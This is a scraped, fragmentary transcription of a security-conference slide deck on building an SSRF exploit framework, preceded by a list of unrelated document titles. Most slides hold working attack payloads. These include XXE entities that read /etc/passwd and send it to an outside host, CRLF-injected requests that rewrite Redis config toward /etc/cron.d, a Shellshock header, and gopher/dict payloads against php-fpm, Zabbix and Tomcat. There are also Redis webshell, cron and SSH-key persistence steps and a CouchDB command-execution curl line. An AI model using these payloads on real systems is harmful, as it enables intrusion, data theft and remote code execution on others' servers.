Build Your SSRF Exploit Framework SSRF

Similar documents
Shankersinh Vaghela Bapu Institue of Technology

OWASPORLANDO. XXE: The Anatomy of an XML Attack. Mike Felch OWASP Orlando

Foundations of Python

02267: Software Development of Web Services

Application security. Not so obvious vulnerabilities. Nicolas Grégoire / Agarri CERN

Lecture Notes course Software Development of Web Services

Computer Networks. Wenzhong Li. Nanjing University

CNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components

How to work with HTTP requests and responses

2 Oracle WebLogic Overview Prerequisites Baseline Architecture...6

Downloading Text and Binary Objects with curl

Application Level Protocols

REST Web Services Objektumorientált szoftvertervezés Object-oriented software design

(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection

QEMU Basic. Create the Hardware System

Data Access and Analysis with Distributed, Federated Data Servers in climateprediction.net

CNIT 129S: Securing Web Applications. Ch 3: Web Application Technologies

Data Avenue REST API. Ákos Hajnal, Zoltán Farkas November, 2015

Image Security Review Standard V1.0

HHC 2017 writeup, by RedTeam611

Chapter 27 WWW and HTTP Copyright The McGraw-Hill Companies, Inc. Permission required for reproduction or display.

CA SiteMinder Web Services Security

Unraveling the Mysteries of J2EE Web Application Communications

edocs Home > BEA AquaLogic Service Bus 3.0 Documentation > Accessing ALDSP Data Services Through ALSB

Ethernet / TCP-IP - Training Suite Application level protocols

Nessus Scan Report. Hosts Summary (Executive) Hosts Summary (Executive) Mon, 15 May :27:44 EDT

WS-* Standards. Szolgáltatásorientált rendszerintegráció Service-Oriented System Integration. Dr. Balázs Simon BME, IIT

Session 8. Reading and Reference. en.wikipedia.org/wiki/list_of_http_headers. en.wikipedia.org/wiki/http_status_codes

7) Malicious File Execution

Developer Internship Opportunity at I-CC

Breaking cloud isolation

Attacks Description - Action Policy

Chapter 2: outline. 2.6 P2P applications 2.7 socket programming with UDP and TCP

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.

WEB TECHNOLOGIES CHAPTER 1

Web Services and SOA. The OWASP Foundation Laurent PETROQUE. System Engineer, F5 Networks

HTTP Protocol and Server-Side Basics

Traditional Web Based Systems

HTTP Reading: Section and COS 461: Computer Networks Spring 2013

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

Protocols. Application Layer FTP, HTTP, SSH, IMAP. Transport Layer TCP, UDP. Internet Layer IP. Link Layer Ethernet, WiFi

DATA COMMUNICATOIN NETWORKING

Exercise SBPM Session-4 : Web Services

Applications Security

INF5750. RESTful Web Services

Application Layer: The Web and HTTP Sec 2.2 Prof Lina Battestilli Fall 2017

Produced by. Mobile Application Development. Higher Diploma in Science in Computer Science. Eamonn de Leastar

SCS3004 Networking Technologies Application Layer Protocols

Writing Servlets and JSPs p. 1 Writing a Servlet p. 1 Writing a JSP p. 7 Compiling a Servlet p. 10 Packaging Servlets and JSPs p.

TFTP and FTP Basics BUPT/QMUL

Penetration Testing with Kali Linux

Mac OS X Server Web Technologies Administration. For Version 10.3 or Later

CS631 - Advanced Programming in the UNIX Environment

World Wide Web. Before WWW

Session 8. Introduction to Servlets. Semester Project

HTTP Console Documentation

Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection

ATTACKING SYSTEM & WEB Desmond Alexander CISSP / GIAC/ GPEN CEO FORESEC

Application-layer Protocols and Internet Services

Introduction to the Cisco ANM Web Services API

Attacking Next- Generation Firewalls

From blind XXE to root-level file read access

PHP unserialize. Pavel Toporkov

Patch Server for Jamf Pro Documentation

It s a PHP unserialization vulnerability Jim, but not as we know it. Sam Thomas

XPort Pro Command Reference

Information Network Systems The application layer. Stephan Sigg

Lecture Overview. IN5290 Ethical Hacking. Lecture 4: Web hacking 1, Client side bypass, Tampering data, Brute-forcing

System Configuration

Schema Validation Errors While Parsing Weblogic

SOAP Introduction Tutorial

21.1 FTP. Connections

Spoilt for Choice Which Integration Framework to choose? Mule ESB. Integration. Kai Wähner

Application Layer: HTTP

Jeff Offutt SWE 642 Software Engineering for the World Wide Web

Nginx HTTP Server. Adopt Nginx for your web applications to make the most of your infrastructure and serve pages faster than ever.

Open a browser and download the Apache Tomcat 7 and Oracle JDBC 6 JAR from these locations. The Oracle site may require that you register as a user.

REST Easy with Infrared360

WWW: the http protocol

CONTENTS IN DETAIL INTRODUCTION 1 THE FAQS OF LIFE THE SCRIPTS EVERY PHP PROGRAMMER WANTS (OR NEEDS) TO KNOW 1 2 CONFIGURING PHP 19

Middleware and Web Services Lecture 3: Application Server

Websphere Force Uninstall Application Server 7 Linux Installation

Advanced Penetration Testing

CS321: Computer Networks FTP, TELNET, SSH

Hacking Web Sites OWASP Top 10

Alpha College of Engineering and Technology. Question Bank

Application protocols & presentation layer

H1-212 Capture the Flag Solution Author: Corben Douglas

INTERNET ENGINEERING. HTTP Protocol. Sadegh Aliakbary

Ftp Command Line Commands Linux Example Windows Put

COSC 2206 Internet Tools. The HTTP Protocol

CS 43: Computer Networks. Layering & HTTP September 7, 2018

Chapter 2: outline. 2.6 P2P applications 2.7 socket programming with UDP and TCP

Excerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt

World-Wide Web Protocols CS 571 Fall Kenneth L. Calvert All rights reserved

Creating a Multi-Container Pod

Outline of Lecture 3 Protocols

PyNetSim A modern INetSim Replacement. Jason Jones FIRST 2017

AIM Enterprise Platform Software IBM z/transaction Processing Facility Enterprise Edition 1.1.0

netcat Johannes Franken

Transcription:

Build Your SSRF Exploit Framework SSRF

@ringzero

KNOW IT HACK IT HOW SSRF SSRF SSRF SSRF SSRF

KNOW IT, SSRF? http://10.10.10.10:8080/manager/images/tomcat.gif Web Interface

KNOW IT SSRF

Redis server HTTP server 80 & 8080 SSRF_Interface APP server

SSRF ( FingerPrint ) {Payload} DOS( Keep-Alive Always ) users / dirs / files

SSRF Request MongoDB MemCache Redis-Server

100% OpenSSL (Cookies & User:Pass)

OpenSSL TSL HELLO OpenSSL SSL

Cookies, USER & PASS,?!!! WEB SERVER 1024 * DOS

KNOW IT, SSRF SSRF ( Upload from URL, Import & Export RSS feed) (Oracle MongoDB MSSQL Postgres CouchDB) Webmail (POP3/IMAP/SMTP) (ffpmg, ImageMaic, DOCX, PDF XML )

-> SSRF Upload from URL Discuz! Import & Export RSS feed Web Blog XML Wordpress xmlrpc.php

XML -> SSRF XXE XSLT Template DTD XML XSLT Processor (Saxon) Output Files XLST -- XML

XML Fuzz Cheatsheet ( ) DTD Remote Access <!ENTITY % d SYSTEM "http://wuyun.org/evil.dtd"> XML External Entity <!ENTITY % file system "file:///etc/passwd" > <!ENTITY % d SYSTEM http://wuyun.org/file?data=%file"> URL Invocation URL XML Encryption XML <xenc:agreementmethod Algorithm= "http://wuyun.org/1"> <xenc:encryptionproperty Target= "http://wuyun.org/2"> <xenc:cipherreference URI= "http://wuyun.org/3"> <xenc:datareference URI= http://wuyun.org/4"> <!DOCTYPE roottag PUBLIC "-//VSR//PENTEST//EN" http://wuyun.org/urlin"> <roottag>test</roottag>

XML Fuzz Cheatsheet Web Services XML Signature XML <Reference URI= http://wuyun.org/5"> WS Policy SOA WS <To xmlns= http://www.w3.org/2005/08/addressing">http://wuyun.org/to</to> <ReplyTo xmlns="http://www.w3.org/2005/08/addressing"> <Address>http://wuyun.org/rto</Address> </ReplyTo> WS Addressing Web Services From WS Security JAVA WEB <wsp:policyreference URI= http://wuyun.org/pr"> <input message="wooyun" wsa:action="http://wuyun.org/ip" /> <output message="wooyun" wsa:action="http://wuyun.org/op" />

XML Fuzz Cheatsheet WS Federation Web Services <fed:federation FederationID="http://wuyun.org/fid"> <fed:federationinclude>http://wuyun.org/inc</fed:federationinclude> <fed:tokenissuername>http://wuyun.org/iss</fed:tokenissuername> <mex:metadatareference> <wsa:address>http://wuyun.org/mex</wsa:address> XBRL </mex:metadatareference> <xbrli:identifier scheme="http://wuyun.org/xbr"> <link:roletype roleuri= http://wuyun.org/role"> ODATA (edmx) <edmx:reference URI="http://wuyun.org/edmxr"> <edmx:annotationsreference URI="http://wuyun.org/edmxa"> STRATML <stratml:source>http://wuyun.org/stml</stratml:source>

(MongoDB) -> SSRF > db.copydatabase('\r\nconfig set dbfilename wyssrf\r\nquit\r\n,'test','10.6.4.166:6379') [root@10-6-4-166 ~]# nc -l -vv 6379 Connection from 10.6.19.144 port 6379 [tcp/*] config set dbfilename wyssrf quit.system.namespaces > db.copydatabase( helo','test','10.6.4.166:22'); {"errmsg" : helo.systemnamespaces failed: " } > db.copydatabase( helo','test','10.6.4.166:9999'); {"errormsg" : "couldn't connect to server 10.6.4.166:9999"} 50000+ MongoDB Server

(Oracle) -> SSRF UTL_HTTP UTL_TCP UTL_SMTP http://docs.oracle.com/cd/e11882_01/appdev.112/e40758/u_http.htm

(PostgresSQL) -> SSRF dblink_send_query() SELECT dblink_send_query( host=127.0.0.1 dbname=quit user=\'\r\nconfig set dbfilename wyssrf\r\n\quit\r\n password=1 port=6379 sslmode=disable, 'select version(); ); [root@localhost ~]# nc -l -vv 6379 Connection from 127.0.0.1 port 6379 [tcp/*] config set dbfilename wyssrf quit https://www.postgresql.org/docs/8.4/static/dblink.html

(MSSQL) -> SSRF OpenRowset() SELECT openrowset('sqloledb', 'server=192.168.1.5;uid=sa;pwd=sa;database=master') : OpenDatasource() XP_CMDSHELL SELECT * FROM OpenDatasource('SQLOLEDB', 'Data Source=ServerName;User ID=sa;Password=sa' ).Northwind.dbo.Categories https://msdn.microsoft.com/zh-cn/library/ms190312.aspx

(CouchDB) -> SSRF HTTP API /_replicate POST http://couchdb-server:5984/_replicate Content-Type: application/json Accept: application/json { "source" : "recipes", "target" : dict://redis.wuyun.org:6379/flushall, } https://docs.couchdb.org/en/stable/api/server/common.html

Webmail (POP3/IMAP/SMTP) -> SSRF QQ 163/126

-> SSRF FFmpeg concat:http://wyssrf.wuyun.org/header.y4m file:///etc/passwd ImageMagick (mvg URL HTTP ) fill 'url(http://wyssrf.wuyun.org)' & PDF DOCX XML parsers ( XSLT ) XSLT 100 document(): xml include(): import():

HACK IT SSRF

HACK IT, SSRF & {payload}? IP (xip.io IP IP) (Redirect CRLF header injection) XXE -> SSRF -> CSRF (Protocols & Wrappers)

? URI Domain.tld url=http://www.10.10.10.10.xip.io (wooyun-2010-0162607 ) 10 / 172 / 192 / 127 IP IP *256**3 + *256**2 + *256 IP 012.10.10.10 = 10.10.10.10 startswith( http ) 302 Redirect CRLF ( Ascii Code ) header injection ASCII %20 -> 0x20 -> %23 -> 0x23 -> # %0d -> 0x0d -> CR \r %0a -> 0x0a-> LF \n %08 -> 0x08 -> BS %00 -> 0x00 -> Null Byte

SSRF -> 302 302 http Discuz! SSRF /forum.php?mod=ajax&action=downremoteimg&message= [img]http://wuyun.org/302.php?helo.jpg[/img] HTTP Scheme - - - - > DICT Scheme 302.php <?php header("location: dict://wuyun.org:6379/set:1:helo ); # set 1 helo \n http://www.wooyun.org/bugs/wooyun-2010-0215779

WebLogic SSRF HTTP ( ) CRLF Header Injection HTTP POST /helo HTTP/1.1 Content-Type: text/xml; charset=utf-8 WebLogic uddiexplorer SSRF User-Agent: Java1.6.0_11 Host: wuyun.org Connection: Keep-Alive http://localhost:7001/uddiexplorer/ SearchPublicRegistries.jsp? operator=http://wuyun.org/helo& rdosearch=name&btnsubmit=search CRLF ->ASCII Code <?xml version="1.0" encoding="utf-8" standalone="yes"?> <env:envelope xmlns:soapenc= http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd= http://www.w3.org/2001/xmlschema" xmlns:xsi="http://www.w3.org/2001/xmlschema-instance"> <env:header></env:header><env:body> <find_business generic="2.0" xmlns="urn:uddi-org:api_v2"> <name>%</name></find_business> </env:body></env:envelope> - %0d -> 0x0d-> \r - %0a -> 0x0a -> \n http://wuyun.org/helo%0d%0a

WebLogic SSRF CRLF HTTP 0-day 1 operator=http://wuyun.org/helo%20 HTTP/1.1 %0d%0a(\r\n) HOST: fuzz.wuyun.com %0d%0a(\r\n) [root@wuyun.org ~]# nc -l 80 POST /helo HTTP/1.1 HOST: fuzz.wuyun.com User-Agent: Java1.6.0_11 Host: wuyun.org 2 operator=http://wuyun.org:6379/helo %0d%0a(\r\n) config set dir /etc/cron.d/ %0d%0a(\r\n) quit%0d%0a(\r\n) [root@wuyun.org ~]# nc -l 6379 POST /helo config set dir /etc/cron.d/ quit HTTP/1.1

WebLogic SSRF operator=http://wuyun.org:21/ %08%08%08%08%08%08 %0d%0a USER ftp SHELLSHOCK %0d%0a POST /cgi-bin/test-cgi%0d%0a PASS ftp User-Agent: () { foo;};echo;/bin/ping cloudeye.me %0d%0a %0d%0a HTTP/1.1 pwd %0d%0a GET /abc%0d%0a

WebLogic SSRF (FingerPrint) weblogic.uddi.client.structures.exception.xml_soapexception: Tried all: '1' addresses, but could not connect over HTTP to server: 'fuzz.wuyun.com', port: '88' weblogic.uddi.client.structures.exception.xml_soapexception: Received a response from url: http://www.baidu.com/ which did not have a valid SOAP content-type: text/html; charset=utf-8. weblogic.uddi.client.structures.exception.xml_soapexception: Received a response from url: http://fuzz.wuyun.com:22/helo which did not have a valid SOAP content-type: null. weblogic.uddi.client.structures.exception.xml_soapexception: Received a response from url: http://fuzz.wuyun.com:22 which did not have a valid SOAP content-type: null. https://wap.ccb.com/uddi/uddilistener <dispositionreport generic="2.0" operator="http://11.168.100.21:7001">

DEMO : WebLogic SSRF CRLF + Redis

WebLogic SSRF 80% BEA & Oracle 70% WebLogic & 90%

SSRF -> Protocols & Wrappers Atlassian Confluence CVE-2015-8399 /spaces/viewdefaultdecorator.action?decoratorname=./web-inf/web.xml & /etc/passwd /spaces/viewdefaultdecorator.action?decoratorname=file:///etc/passwd /spaces/viewdefaultdecorator.action?decoratorname=gopher://wuyun.org/_hi Resin-Doc /resin-doc/resource/tutorial/jndi-appconfig/test?inputfile=/etc/passwd /resin-doc/resource/tutorial/jndi-appconfig/test?inputfile=gopher://wuyun.org/_hi

SSRF -> Protocols & Wrappers PHP http://php.net/manual/en/wrappers.php Java sun.net.www.protocol.* file ftp gopher http https jar mailto netdoc file:// Accessing local filesystem http:// Accessing HTTP(s) URLs ftp:// Accessing FTP(s) URLs php:// Accessing various I/O streams zlib:// Compression Streams data:// Data (RFC 2397) glob:// Find pathnames matching pattern phar:// PHP Archive ssh2:// Secure Shell 2 rar:// RAR expect:// Process Interaction Streams

SSRF -> UDP FTP & SMTP & POP3 GET /path HTTP/1.1 POST /path HTTP/1.1 HTTP tftp://10.10.10.10/get helo SMBreplay & BadTunnel WebDav: PUT MOVE DEL UNC Call: \\10.10.10.10\c$\boot.ini tftp ftp telnet dict ldap ldaps http file https ftps scp sftp

1 -> SSRF Tomcat Management dict://localhost:8005/shutdown%0d%0a dict://localhost:10050/vfs.file.regexp[/etc/hosts,7] Zabbix Agentd ZBXD?127.0.0.1 localhost dict://localhost:10050/system.run[ls] Nagios Agentd ZBXD,usr etc var boot Fastcgi ( php-fpm ) gopher://localhost:9000/_...[php_value allow_url_include = On]

2 -> SSRF & REDIS 6 Redis 1. www, webshell 2. SSH authotrized_keys Memcached 3. (/var/spool/cron/ & /etc/cron.d/) CouchDB 4. 5. 6. slave of 8.8.8.8 /etc/profile.d/ AOF appendfilename

SSRF Memcached Session adminid= Memecached JS/html... vbulletin ( Memcached ) http://drops.wooyun.org/papers/8261 Discuz ( Redis & Memcached ) http://www.wooyun.org/bugs/wooyun-2016-0213982 @Jannock

SSRF CouchDB SSRF HTTP /_replicate API SSRF Restful API curl -X PUT 'http://1.1.1.1:5984/_config/query_servers/cmd' -d '"/sbin/ifconfig >/tmp/6666"' 1 5400 > CouchDB

3 XXE -> SSRF -> CSRF CoreMail IP API @Asuri /apiws/services/api?wsdl & CoreMail XML XXE SSRF SSRF API http://www.wooyun.org/bugs/wooyun-2010-0192796... @applychen

HOW?

How Python furl / requests / multiprocessing / time / re http://zone.wooyun.org/content/23255 (http <GET POST> dict gopher tftp)

Keep-Alive: timeout=5 ftp://wuyun.org:6379 Keep-Alive http & dict://wuyun.org:6379, / > db.copydatabase( helo','test','10.6.4.166:22'); {"errmsg" : helo.systemnamespaces failed: " } > db.copydatabase( helo','test','10.6.4.166:6379'); {"errormsg" : "couldn't connect to server 10.6.4.166:6379"} [root@localhost ~] # curl http://wuyun.org:22 SSH-2.0-OpenSSH_5.3 Protocol mismatch.

SITE : tangscan.com SSRF

jboss.py jdwp.py shellshock.py axis2.py jenkins.py smtp.py confluence.py struts2.py couchdb.py mongodb.py tftp.py docker.py php_fastcgi.py jboss invoker war java bash axis2-admin Server jenkins scripts smtp confluence ssrf (gopher) struts2 counchdb WEB API mongodb SSRF tftp udp docker API php_fpm, fastcgi gopher SHELL

tomcat.py elasticsearch.py pop.py webdav.py ftp.py portscan.py websphere.py gopher.py pstack.py zentaopms.py hfs.py glassfish.py tomcat /manager/html war ES Groovy pop3 WebDav PUT ftp WebSphere Admin war gopher do anything Apache Hadoop zentopms HFS glassfish war

SQLMAP python wyssrf.py config -u http://wuyun.org/?url=qq.com -p url

SSRF

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback